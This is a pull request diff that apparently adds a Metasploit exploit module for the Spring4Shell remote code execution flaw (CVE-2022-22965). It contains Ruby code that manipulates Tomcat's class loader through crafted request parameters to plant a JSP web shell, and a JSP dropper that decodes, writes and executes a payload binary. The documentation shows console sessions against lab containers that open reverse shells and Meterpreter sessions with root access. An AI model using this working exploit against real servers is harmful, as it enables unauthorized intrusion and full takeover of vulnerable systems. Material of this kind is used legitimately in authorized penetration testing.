### PR TITLE
Add module for exploit CVE-2022-22965

### DIFF
--- a/documentation/modules/exploit/multi/http/spring_framework_rce_spring4shell.md
+++ b/documentation/modules/exploit/multi/http/spring_framework_rce_spring4shell.md
@@ -21,25 +21,36 @@ gain remote code execution.
 6. Run the exploit
 
 ## Options
+```
+msf6 exploit(multi/http/spring_framework_rce_spring4shell) > show targets
 
+Exploit targets:
+
+   Id  Name
+   --  ----
+   0   Java
+   1   Linux
+   2   Windows
+```
 ## Scenarios
-
-### Spring Framework v5.3.15 on Linux (debian docker image)
+Spring Framework v5.3.15 on Linux (debian docker image)
+### Target Java
 
 ```
 msf6 exploit(multi/http/spring_framework_rce_spring4shell) > show options
 
 Module options (exploit/multi/http/spring_framework_rce_spring4shell):
 
-   Name            Current Setting       Required  Description
-   ----            ---------------       --------  -----------
-   FILEDROPPERDIR  /tmp/                 no        The directory used for filedropper (only applicable to non-Java target)
-   Proxies                               no        A proxy chain of format type:host:port[,type:host:port][...]
-   RHOSTS          127.0.0.1             yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
-   RPORT           8085                  yes       The target port (TCP)
-   SSL             false                 no        Negotiate SSL/TLS for outgoing connections
-   TARGETURI       /helloworld/greeting  yes       The path to the application action
-   VHOST                                 no        HTTP server virtual host
+   Name             Current Setting       Required  Description
+   ----             ---------------       --------  -----------
+   FILEDROPPER_DIR  /tmp/                 no        Path to write the filedropper (only applicable to non-Java targets)
+   PAYLOAD_PATH     webapps/ROOT          yes       Path to write the payload
+   Proxies                                no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS           127.0.0.1             yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT            8085                  yes       The target port (TCP)
+   SSL              false                 no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI        /helloworld/greeting  yes       The path to the application action
+   VHOST                                  no        HTTP server virtual host
 
 
 Payload options (java/jsp_shell_reverse_tcp):
@@ -70,4 +81,53 @@ msf6 exploit(multi/http/spring_framework_rce_spring4shell) > exploit
 
 whoami
 root
+```
+
+### Target Linux (x86)
+```
+msf6 exploit(multi/http/spring_framework_rce_spring4shell) > show options
+
+Module options (exploit/multi/http/spring_framework_rce_spring4shell):
+
+   Name             Current Setting       Required  Description
+   ----             ---------------       --------  -----------
+   FILEDROPPER_DIR  /tmp/                 no        Path to write the filedropper (only applicable to non-Java targets)
+   PAYLOAD_PATH     webapps/ROOT          yes       Path to write the payload
+   Proxies                                no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS           127.0.0.1             yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT            8085                  yes       The target port (TCP)
+   SSL              false                 no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI        /helloworld/greeting  yes       The path to the application action
+   VHOST                                  no        HTTP server virtual host
+
+
+Payload options (linux/x86/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  192.168.0.174    yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   1   Linux
+
+
+msf6 exploit(multi/http/spring_framework_rce_spring4shell) > exploit
+
+[*] Started reverse TCP handler on 192.168.0.174:4444
+[*] 127.0.0.1:8085 - Generating JSP...
+[*] 127.0.0.1:8085 - Modifying Class Loader...
+[*] 127.0.0.1:8085 - Waiting for the server to flush the logfile
+[*] Sending stage (989032 bytes) to 192.168.0.174
+[+] 127.0.0.1:8085 - Log file flushed at http://127.0.0.1:8085/M3zxL1.jsp
+[+] Deleted /tmp/FMNk
+[*] Meterpreter session 5 opened (192.168.0.174:4444 -> 192.168.0.174:59465 ) at 2022-04-08 11:00:08 +0200
+[!] This exploit may require manual cleanup of 'M3zxL1.jsp' on the target
+
+meterpreter > getuid
+Server username: root
 ```

--- a/documentation/modules/exploit/multi/http/spring_framework_rce_spring4shell.md
+++ b/documentation/modules/exploit/multi/http/spring_framework_rce_spring4shell.md
@@ -1,0 +1,73 @@
+## Vulnerable Application
+
+Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions when running on JDK 9 or above 
+and specifically packaged as a traditional WAR and deployed in a standalone Tomcat instance are vulnerable 
+to remote code execution due to an unsafe data binding used to populate an object from request parameters 
+to set a Tomcat specific ClassLoader. By crafting a request to the application and referencing the 
+org.apache.catalina.valves.AccessLogValve class through the classLoader with parameters such as the following:
+class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp, an unauthenticated attacker can 
+gain remote code execution.
+
+## Verification Steps
+
+1. Build the application
+   1. `git clone https://github.com/vleminator/Spring4Shell-POC`
+   2. `docker build . -t spring4shell`
+2. Run the application
+   1. `docker run -p 8085:8080 spring4shell`
+3. Start msfconsole
+4. Run: `use exploit/multi/http/spring4shell`
+5. Set the `RHOSTS`, `TARGET`, `PAYLOAD` and payload associated datastore options
+6. Run the exploit
+
+## Options
+
+## Scenarios
+
+### Spring Framework v5.3.15 on Linux (debian docker image)
+
+```
+msf6 exploit(multi/http/spring4shell) > show options
+
+Module options (exploit/multi/http/spring4shell):
+
+   Name            Current Setting       Required  Description
+   ----            ---------------       --------  -----------
+   FILEDROPPERDIR  /tmp/                 no        The directory used for filedropper (only applicable to non-Java target)
+   Proxies                               no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS          127.0.0.1             yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT           8085                  yes       The target port (TCP)
+   SSL             false                 no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI       /helloworld/greeting  yes       The path to the application action
+   VHOST                                 no        HTTP server virtual host
+
+
+Payload options (java/jsp_shell_reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  192.168.0.174    yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+   SHELL                   no        The system shell to use.
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Java
+
+
+msf6 exploit(multi/http/spring4shell) > exploit
+
+[*] Started reverse TCP handler on 192.168.0.174:4444
+[*] 127.0.0.1:8085 - Generating JSP...
+[*] 127.0.0.1:8085 - Modifying Class Loader...
+[*] 127.0.0.1:8085 - Waiting for the server to flush the logfile
+[+] 127.0.0.1:8085 - Log file flushed at http://127.0.0.1:8085/lKNWl49.jsp
+[!] Tried to delete lKNWl49.jsp, unknown result
+[*] Command shell session 2 opened (192.168.0.174:4444 -> 192.168.0.174:56430 ) at 2022-04-07 14:45:06 +0200
+
+whoami
+root
+```

--- a/documentation/modules/exploit/multi/http/spring_framework_rce_spring4shell.md
+++ b/documentation/modules/exploit/multi/http/spring_framework_rce_spring4shell.md
@@ -16,7 +16,7 @@ gain remote code execution.
 2. Run the application
    1. `docker run -p 8085:8080 spring4shell`
 3. Start msfconsole
-4. Run: `use exploit/multi/http/spring4shell`
+4. Run: `use exploit/multi/http/spring_framework_rce_spring4shell`
 5. Set the `RHOSTS`, `TARGET`, `PAYLOAD` and payload associated datastore options
 6. Run the exploit
 
@@ -27,9 +27,9 @@ gain remote code execution.
 ### Spring Framework v5.3.15 on Linux (debian docker image)
 
 ```
-msf6 exploit(multi/http/spring4shell) > show options
+msf6 exploit(multi/http/spring_framework_rce_spring4shell) > show options
 
-Module options (exploit/multi/http/spring4shell):
+Module options (exploit/multi/http/spring_framework_rce_spring4shell):
 
    Name            Current Setting       Required  Description
    ----            ---------------       --------  -----------
@@ -58,7 +58,7 @@ Exploit target:
    0   Java
 
 
-msf6 exploit(multi/http/spring4shell) > exploit
+msf6 exploit(multi/http/spring_framework_rce_spring4shell) > exploit
 
 [*] Started reverse TCP handler on 192.168.0.174:4444
 [*] 127.0.0.1:8085 - Generating JSP...

--- a/documentation/modules/exploit/multi/http/spring_framework_rce_spring4shell.md
+++ b/documentation/modules/exploit/multi/http/spring_framework_rce_spring4shell.md
@@ -21,42 +21,44 @@ gain remote code execution.
 6. Run the exploit
 
 ## Options
-```
-msf6 exploit(multi/http/spring_framework_rce_spring4shell) > show targets
+### HTTP_METHOD
+HTTP method to use for checking and exploitation. If set to `Automatic` (the default value), the method will be
+automatically identified. Automatically identifying the HTTP method uses the check method.
 
-Exploit targets:
+### PAYLOAD_PATH
+Path to write the payload. This is relative to the tomcat installation directory.
 
-   Id  Name
-   --  ----
-   0   Java
-   1   Linux
-   2   Windows
-```
 ## Scenarios
-Spring Framework v5.3.15 on Linux (debian docker image)
-### Target Java
+
+### Target Java (vulhub container)
+
+The target is the [vulhub container](https://github.com/vulhub/vulhub/tree/master/spring/CVE-2022-22965) which uses the
+GET HTTP method.
 
 ```
-msf6 exploit(multi/http/spring_framework_rce_spring4shell) > show options
+msf6 > use exploit/multi/http/spring_framework_rce_spring4shell 
+[*] No payload configured, defaulting to generic/shell_reverse_tcp
+msf6 exploit(multi/http/spring_framework_rce_spring4shell) > show options 
 
 Module options (exploit/multi/http/spring_framework_rce_spring4shell):
 
-   Name          Current Setting       Required  Description
-   ----          ---------------       --------  -----------
-   PAYLOAD_PATH  webapps/ROOT          yes       Path to write the payload
-   Proxies                             no        A proxy chain of format type:host:port[,type:host:port][...]
-   RHOSTS        127.0.0.1             yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
-   RPORT         8085                  yes       The target port (TCP)
-   SSL           false                 no        Negotiate SSL/TLS for outgoing connections
-   TARGETURI     /helloworld/greeting  yes       The path to the application action
-   VHOST                               no        HTTP server virtual host
+   Name          Current Setting                 Required  Description
+   ----          ---------------                 --------  -----------
+   HTTP_METHOD   Automatic                       no        HTTP method to use (Accepted: Automatic, GET, POST)
+   PAYLOAD_PATH  webapps/ROOT                    yes       Path to write the payload
+   Proxies                                       no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                                        yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT         8080                            yes       The target port (TCP)
+   SSL           false                           no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI     /app/example/HelloWorld.action  yes       The path to the application action
+   VHOST                                         no        HTTP server virtual host
 
 
 Payload options (generic/shell_reverse_tcp):
 
    Name   Current Setting  Required  Description
    ----   ---------------  --------  -----------
-   LHOST  192.168.0.174    yes       The listen address (an interface may be specified)
+   LHOST  192.168.250.134  yes       The listen address (an interface may be specified)
    LPORT  4444             yes       The listen port
 
 
@@ -67,45 +69,60 @@ Exploit target:
    0   Java
 
 
+msf6 exploit(multi/http/spring_framework_rce_spring4shell) > set PAYLOAD java/jsp_shell_reverse_tcp 
+PAYLOAD => java/jsp_shell_reverse_tcp
+msf6 exploit(multi/http/spring_framework_rce_spring4shell) > exploit http://192.168.159.128:8080/
 
-msf6 exploit(multi/http/spring_framework_rce_spring4shell) > exploit
+[*] Started reverse TCP handler on 192.168.250.134:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable.
+[+] Automatically identified HTTP method: GET
+[*] 192.168.159.128:8080 - Generating JSP...
+[*] 192.168.159.128:8080 - Modifying Class Loader...
+[*] 192.168.159.128:8080 - Waiting for the server to flush the logfile
+[*] 192.168.159.128:8080 - Executing JSP payload at http://192.168.159.128:8080/MUpts6425.jsp
+[+] 192.168.159.128:8080 - Log file flushed
+[*] Command shell session 1 opened (192.168.250.134:4444 -> 172.19.0.2:47418 ) at 2022-05-05 10:47:50 -0400
 
-[*] Started reverse TCP handler on 192.168.0.174:4444
-[*] 127.0.0.1:8085 - Generating JSP...
-[*] 127.0.0.1:8085 - Modifying Class Loader...
-[*] 127.0.0.1:8085 - Waiting for the server to flush the logfile
-[*] 127.0.0.1:8085 - Executing JSP payload
-[+] 127.0.0.1:8085 - Log file flushed at /webapps/ROOT/a0l048.jsp
-[!] Tried to delete a0l048.jsp, unknown result
-[*] Command shell session 2 opened (192.168.0.174:4444 -> 192.168.0.174:52032 ) at 2022-04-28 00:20:00 +0200
-
-whoami
-root
+id
+uid=0(root) gid=0(root) groups=0(root)
+pwd
+/usr/local/tomcat
 ```
 
-### Target Linux (x86)
+### Target Linux (x64)
+
+The target is the [vleminator container](https://github.com/vleminator/Spring4Shell-POC) which uses the
+POST HTTP method.
+
 ```
-msf6 exploit(multi/http/spring_framework_rce_spring4shell) > show options
+msf6 > use exploit/multi/http/spring_framework_rce_spring4shell
+[*] Using configured payload java/jsp_shell_reverse_tcp
+msf6 exploit(multi/http/spring_framework_rce_spring4shell) > set TARGET Linux 
+TARGET => Linux
+msf6 exploit(multi/http/spring_framework_rce_spring4shell) > set PAYLOAD linux/x64/meterpreter/reverse_tcp 
+PAYLOAD => linux/x64/meterpreter/reverse_tcp
+msf6 exploit(multi/http/spring_framework_rce_spring4shell) > show options 
 
 Module options (exploit/multi/http/spring_framework_rce_spring4shell):
 
-   Name          Current Setting       Required  Description
-   ----          ---------------       --------  -----------
-   PAYLOAD_PATH  webapps/ROOT          yes       Path to write the payload
-   Proxies                             no        A proxy chain of format type:host:port[,type:host:port][...]
-   RHOSTS        127.0.0.1             yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
-   RPORT         8085                  yes       The target port (TCP)
-   SSL           false                 no        Negotiate SSL/TLS for outgoing connections
-   TARGETURI     /helloworld/greeting  yes       The path to the application action
-   VHOST                               no        HTTP server virtual host
+   Name          Current Setting                 Required  Description
+   ----          ---------------                 --------  -----------
+   HTTP_METHOD   Automatic                       no        HTTP method to use (Accepted: Automatic, GET, POST)
+   PAYLOAD_PATH  webapps/ROOT                    yes       Path to write the payload
+   Proxies                                       no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                                        yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT         8080                            yes       The target port (TCP)
+   SSL           false                           no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI     /app/example/HelloWorld.action  yes       The path to the application action
+   VHOST                                         no        HTTP server virtual host
 
 
-Payload options (linux/x86/shell_reverse_tcp):
+Payload options (linux/x64/meterpreter/reverse_tcp):
 
    Name   Current Setting  Required  Description
    ----   ---------------  --------  -----------
-   CMD    /bin/sh          yes       The command string to execute
-   LHOST  192.168.0.174    yes       The listen address (an interface may be specified)
+   LHOST  192.168.250.134  yes       The listen address (an interface may be specified)
    LPORT  4444             yes       The listen port
 
 
@@ -116,18 +133,30 @@ Exploit target:
    1   Linux
 
 
-msf6 exploit(multi/http/spring_framework_rce_spring4shell) > exploit
+msf6 exploit(multi/http/spring_framework_rce_spring4shell) > exploit http://192.168.159.128:8085/helloworld/greeting
 
-[*] Started reverse TCP handler on 192.168.0.174:4444
-[*] 127.0.0.1:8085 - Generating JSP...
-[*] 127.0.0.1:8085 - Modifying Class Loader...
-[*] 127.0.0.1:8085 - Waiting for the server to flush the logfile
-[*] 127.0.0.1:8085 - Executing JSP payload
-[+] 127.0.0.1:8085 - Log file flushed at /webapps/ROOT/hejXj1.jsp
-[+] Deleted /tmp/YAlc3bD
-[!] Tried to delete hejXj1.jsp, unknown result
-[*] Command shell session 3 opened (192.168.0.174:4444 -> 192.168.0.174:52077 ) at 2022-04-28 00:21:32 +0200
+[*] Started reverse TCP handler on 192.168.250.134:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable.
+[+] Automatically identified HTTP method: POST
+[*] 192.168.159.128:8085 - Generating JSP...
+[*] 192.168.159.128:8085 - Modifying Class Loader...
+[*] 192.168.159.128:8085 - Waiting for the server to flush the logfile
+[*] 192.168.159.128:8085 - Executing JSP payload at http://192.168.159.128:8085/S0J17.jsp
+[+] 192.168.159.128:8085 - Log file flushed
+[*] Sending stage (3020772 bytes) to 172.17.0.2
+[+] Deleted /tmp/6DKA
+[*] Meterpreter session 2 opened (192.168.250.134:4444 -> 172.17.0.2:54902 ) at 2022-05-05 10:52:35 -0400
 
-whoami
-root
+meterpreter > getuid
+Server username: root
+meterpreter > pwd
+/helloworld
+meterpreter > sysinfo
+Computer     : 172.17.0.2
+OS           : Debian 11.2 (Linux 5.17.4-100.fc34.x86_64)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > 
 ```

--- a/documentation/modules/exploit/multi/http/spring_framework_rce_spring4shell.md
+++ b/documentation/modules/exploit/multi/http/spring_framework_rce_spring4shell.md
@@ -41,25 +41,23 @@ msf6 exploit(multi/http/spring_framework_rce_spring4shell) > show options
 
 Module options (exploit/multi/http/spring_framework_rce_spring4shell):
 
-   Name             Current Setting       Required  Description
-   ----             ---------------       --------  -----------
-   FILEDROPPER_DIR  /tmp/                 no        Path to write the filedropper (only applicable to non-Java targets)
-   PAYLOAD_PATH     webapps/ROOT          yes       Path to write the payload
-   Proxies                                no        A proxy chain of format type:host:port[,type:host:port][...]
-   RHOSTS           127.0.0.1             yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
-   RPORT            8085                  yes       The target port (TCP)
-   SSL              false                 no        Negotiate SSL/TLS for outgoing connections
-   TARGETURI        /helloworld/greeting  yes       The path to the application action
-   VHOST                                  no        HTTP server virtual host
+   Name          Current Setting       Required  Description
+   ----          ---------------       --------  -----------
+   PAYLOAD_PATH  webapps/ROOT          yes       Path to write the payload
+   Proxies                             no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS        127.0.0.1             yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT         8085                  yes       The target port (TCP)
+   SSL           false                 no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI     /helloworld/greeting  yes       The path to the application action
+   VHOST                               no        HTTP server virtual host
 
 
-Payload options (java/jsp_shell_reverse_tcp):
+Payload options (generic/shell_reverse_tcp):
 
    Name   Current Setting  Required  Description
    ----   ---------------  --------  -----------
    LHOST  192.168.0.174    yes       The listen address (an interface may be specified)
    LPORT  4444             yes       The listen port
-   SHELL                   no        The system shell to use.
 
 
 Exploit target:
@@ -69,15 +67,17 @@ Exploit target:
    0   Java
 
 
+
 msf6 exploit(multi/http/spring_framework_rce_spring4shell) > exploit
 
 [*] Started reverse TCP handler on 192.168.0.174:4444
 [*] 127.0.0.1:8085 - Generating JSP...
 [*] 127.0.0.1:8085 - Modifying Class Loader...
 [*] 127.0.0.1:8085 - Waiting for the server to flush the logfile
-[+] 127.0.0.1:8085 - Log file flushed at http://127.0.0.1:8085/lKNWl49.jsp
-[!] Tried to delete lKNWl49.jsp, unknown result
-[*] Command shell session 2 opened (192.168.0.174:4444 -> 192.168.0.174:56430 ) at 2022-04-07 14:45:06 +0200
+[*] 127.0.0.1:8085 - Executing JSP payload
+[+] 127.0.0.1:8085 - Log file flushed at /webapps/ROOT/a0l048.jsp
+[!] Tried to delete a0l048.jsp, unknown result
+[*] Command shell session 2 opened (192.168.0.174:4444 -> 192.168.0.174:52032 ) at 2022-04-28 00:20:00 +0200
 
 whoami
 root
@@ -89,22 +89,22 @@ msf6 exploit(multi/http/spring_framework_rce_spring4shell) > show options
 
 Module options (exploit/multi/http/spring_framework_rce_spring4shell):
 
-   Name             Current Setting       Required  Description
-   ----             ---------------       --------  -----------
-   FILEDROPPER_DIR  /tmp/                 no        Path to write the filedropper (only applicable to non-Java targets)
-   PAYLOAD_PATH     webapps/ROOT          yes       Path to write the payload
-   Proxies                                no        A proxy chain of format type:host:port[,type:host:port][...]
-   RHOSTS           127.0.0.1             yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
-   RPORT            8085                  yes       The target port (TCP)
-   SSL              false                 no        Negotiate SSL/TLS for outgoing connections
-   TARGETURI        /helloworld/greeting  yes       The path to the application action
-   VHOST                                  no        HTTP server virtual host
+   Name          Current Setting       Required  Description
+   ----          ---------------       --------  -----------
+   PAYLOAD_PATH  webapps/ROOT          yes       Path to write the payload
+   Proxies                             no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS        127.0.0.1             yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT         8085                  yes       The target port (TCP)
+   SSL           false                 no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI     /helloworld/greeting  yes       The path to the application action
+   VHOST                               no        HTTP server virtual host
 
 
-Payload options (linux/x86/meterpreter/reverse_tcp):
+Payload options (linux/x86/shell_reverse_tcp):
 
    Name   Current Setting  Required  Description
    ----   ---------------  --------  -----------
+   CMD    /bin/sh          yes       The command string to execute
    LHOST  192.168.0.174    yes       The listen address (an interface may be specified)
    LPORT  4444             yes       The listen port
 
@@ -122,12 +122,12 @@ msf6 exploit(multi/http/spring_framework_rce_spring4shell) > exploit
 [*] 127.0.0.1:8085 - Generating JSP...
 [*] 127.0.0.1:8085 - Modifying Class Loader...
 [*] 127.0.0.1:8085 - Waiting for the server to flush the logfile
-[*] Sending stage (989032 bytes) to 192.168.0.174
-[+] 127.0.0.1:8085 - Log file flushed at http://127.0.0.1:8085/M3zxL1.jsp
-[+] Deleted /tmp/FMNk
-[*] Meterpreter session 5 opened (192.168.0.174:4444 -> 192.168.0.174:59465 ) at 2022-04-08 11:00:08 +0200
-[!] This exploit may require manual cleanup of 'M3zxL1.jsp' on the target
+[*] 127.0.0.1:8085 - Executing JSP payload
+[+] 127.0.0.1:8085 - Log file flushed at /webapps/ROOT/hejXj1.jsp
+[+] Deleted /tmp/YAlc3bD
+[!] Tried to delete hejXj1.jsp, unknown result
+[*] Command shell session 3 opened (192.168.0.174:4444 -> 192.168.0.174:52077 ) at 2022-04-28 00:21:32 +0200
 
-meterpreter > getuid
-Server username: root
+whoami
+root
 ```

--- a/modules/exploits/multi/http/spring_framework_rce_spring4shell.rb
+++ b/modules/exploits/multi/http/spring_framework_rce_spring4shell.rb
@@ -74,7 +74,7 @@ class MetasploitModule < Msf::Exploit::Remote
           Opt::RPORT(8080),
           OptString.new('TARGETURI', [ true, 'The path to the application action', "/app/example/HelloWorld.action"]),
           OptString.new('FILEDROPPERDIR', [ false, 'The directory used for filedropper (only applicable to non-Java target)', "/tmp/"]),
-        ], self.class)
+        ])
   end
 
   def jsp_dropper(file, exe)

--- a/modules/exploits/multi/http/spring_framework_rce_spring4shell.rb
+++ b/modules/exploits/multi/http/spring_framework_rce_spring4shell.rb
@@ -63,7 +63,11 @@ class MetasploitModule < Msf::Exploit::Remote
           ]
         ],
       'DisclosureDate' => 'Mar 31 2022',
-      'DefaultTarget'  => 0))
+      'DefaultTarget'  => 0,
+      'Notes' => 
+        {
+          'AKA' => ['Spring4Shell', 'SpringShell']
+        }))
 
       register_options(
         [

--- a/modules/exploits/multi/http/spring_framework_rce_spring4shell.rb
+++ b/modules/exploits/multi/http/spring_framework_rce_spring4shell.rb
@@ -1,9 +1,7 @@
 ##
-# This module requires Metasploit: http//metasploit.com/download
+# This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
-
-require 'msf/core'
 
 class MetasploitModule < Msf::Exploit::Remote
 
@@ -194,8 +192,8 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def check
-    prefix_jsp = rand_text_alphanumeric(3+rand(3))
-    date_format = rand_text_numeric(1+rand(4))
+    prefix_jsp = rand_text_alphanumeric(3..6)
+    date_format = rand_text_numeric(1..5)
     @jsp_file = prefix_jsp + date_format + ".jsp"
 
     status = CheckCode::Safe

--- a/modules/exploits/multi/http/spring_framework_rce_spring4shell.rb
+++ b/modules/exploits/multi/http/spring_framework_rce_spring4shell.rb
@@ -78,7 +78,8 @@ class MetasploitModule < Msf::Exploit::Remote
       [
         Opt::RPORT(8080),
         OptString.new('TARGETURI', [ true, 'The path to the application action', '/app/example/HelloWorld.action']),
-        OptString.new('FILEDROPPERDIR', [ false, 'The directory used for filedropper (only applicable to non-Java target)', '/tmp/']),
+        OptString.new('PAYLOAD_PATH', [true, 'Path to write the payload', 'webapps/ROOT']),
+        OptString.new('FILEDROPPER_DIR', [ false, 'Path to write the filedropper (only applicable to non-Java targets)', '/tmp/']),
       ]
     )
   end
@@ -185,7 +186,7 @@ class MetasploitModule < Msf::Exploit::Remote
     else
       payload_exe = generate_payload_exe
       payload_file = rand_text_alphanumeric(rand(4..7))
-      payload_dir = datastore['FILEDROPPERDIR']
+      payload_dir = datastore['FILEDROPPER_DIR']
 
       jsp = jsp_dropper(payload_dir + payload_file, payload_exe)
       register_files_for_cleanup(payload_dir + payload_file)
@@ -206,7 +207,7 @@ class MetasploitModule < Msf::Exploit::Remote
     print_status("#{peer} - Modifying Class Loader...")
     properties = {
       payload: prefix_jsp,
-      directory: 'webapps/ROOT',
+      directory: datastore['PAYLOAD_PATH'],
       prefix: prefix_jsp,
       suffix: '.jsp',
       file_date_format: date_format
@@ -251,7 +252,7 @@ class MetasploitModule < Msf::Exploit::Remote
     print_status("#{peer} - Modifying Class Loader...")
     properties = {
       payload: jsp,
-      directory: 'webapps/ROOT',
+      directory: datastore['PAYLOAD_PATH'],
       prefix: prefix_jsp,
       suffix: '.jsp',
       file_date_format: date_format

--- a/modules/exploits/multi/http/spring_framework_rce_spring4shell.rb
+++ b/modules/exploits/multi/http/spring_framework_rce_spring4shell.rb
@@ -200,8 +200,6 @@ class MetasploitModule < Msf::Exploit::Remote
     date_format = rand_text_numeric(1..5)
     @jsp_file = prefix_jsp + date_format + ".jsp"
 
-    status = CheckCode::Safe
-
     # Prepare the JSP
     print_status("#{peer} - Generating JSP...")
     
@@ -216,7 +214,7 @@ class MetasploitModule < Msf::Exploit::Remote
     }
     res = modify_class_loader(properties)
     unless res
-      fail_with(Failure::TimeoutExpired, "#{peer} - No answer")
+      return CheckCode::Unknown
     end
 
     # No matter what happened, try to 'restore' the Class Loader
@@ -232,12 +230,10 @@ class MetasploitModule < Msf::Exploit::Remote
     # Check if the log file exists and has been flushed
     if check_log_file(normalize_uri(target_uri.to_s))
       register_files_for_cleanup(@jsp_file)
-      status = CheckCode::Vulnerable
-    else
-      fail_with(Failure::Unknown, "#{peer} - The log file hasn't been flushed")
+      return CheckCode::Vulnerable
     end
 
-    return status
+    return CheckCode::Safe
   end
 
 

--- a/modules/exploits/multi/http/spring_framework_rce_spring4shell.rb
+++ b/modules/exploits/multi/http/spring_framework_rce_spring4shell.rb
@@ -1,0 +1,286 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  Rank = ManualRanking # It's going to manipulate the Class Loader
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::FileDropper
+  include Msf::Exploit::EXE
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Spring Framework Class property RCE (Spring4Shell)',
+      'Description'    => %q{
+        Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions when running on JDK 9 or above 
+           and specifically packaged as a traditional WAR and deployed in a standalone Tomcat instance are vulnerable 
+           to remote code execution due to an unsafe data binding used to populate an object from request parameters 
+           to set a Tomcat specific ClassLoader. By crafting a request to the application and referencing the 
+           org.apache.catalina.valves.AccessLogValve class through the classLoader with parameters such as the following:
+           class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp, an unauthenticated attacker can 
+           gain remote code execution.
+      },
+      'Author'         =>
+        [
+          'vleminator <vleminator[at]gmail.com>'
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          ['CVE', '2022-22965'],
+          ['URL', 'https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement'],
+          ['URL', 'https://github.com/spring-projects/spring-framework/issues/28261'],
+          ['URL', 'https://tanzu.vmware.com/security/cve-2022-22965']
+        ],
+      'Platform'       => %w{ linux win },
+      'Payload'        =>
+        {
+          'Space' => 5000,
+          'DisableNops' => true
+        },
+      'Targets'        =>
+        [
+          ['Java',
+           {
+               'Arch'     => ARCH_JAVA,
+               'Platform' => %w{ linux win }
+           },
+          ],
+          ['Linux',
+           {
+               'Arch'     => [ARCH_X86, ARCH_X64],
+               'Platform' => 'linux'
+           }
+          ],
+          ['Windows',
+            {
+              'Arch'     => [ARCH_X86, ARCH_X64],
+              'Platform' => 'win'
+            }
+          ]
+        ],
+      'DisclosureDate' => 'Mar 31 2022',
+      'DefaultTarget'  => 0))
+
+      register_options(
+        [
+          Opt::RPORT(8080),
+          OptString.new('TARGETURI', [ true, 'The path to the application action', "/app/example/HelloWorld.action"]),
+          OptString.new('FILEDROPPERDIR', [ false, 'The directory used for filedropper (only applicable to non-Java target)', "/tmp/"]),
+        ], self.class)
+  end
+
+  def jsp_dropper(file, exe)
+    #
+    # The sun.misc.BASE64Decoder.decodeBuffer API is no longer available in Java 9.
+    #
+    dropper = <<-eos
+<%@ page import=\"java.io.FileOutputStream\" %>
+<%@ page import=\"java.util.Base64\" %>
+<%@ page import=\"java.io.File\" %>
+<% 
+  FileOutputStream oFile = new FileOutputStream(\"#{file}\", false);
+  oFile.write(Base64.getDecoder().decode(\"#{Rex::Text.encode_base64(exe)}\"));
+  oFile.flush();
+  oFile.close();
+  File f = new File(\"#{file}\");
+  f.setExecutable(true);
+  Runtime.getRuntime().exec(\"#{file}\"); 
+%>
+    eos
+
+    dropper
+  end
+
+  def dump_line(uri, cmd = "")
+    res = send_request_cgi({
+      'uri'     => uri+cmd,
+      'version' => '1.1',
+      'method'  => 'GET',
+    })
+
+    res
+  end
+
+  def modify_class_loader(opts)
+
+    cl_prefix = "class.module.classLoader"
+      # case datastore['STRUTS_VERSION']
+      # when '1.x' then "class.classLoader"
+      # when '2.x' then "class['classLoader']"
+      # end
+
+    res = send_request_cgi({
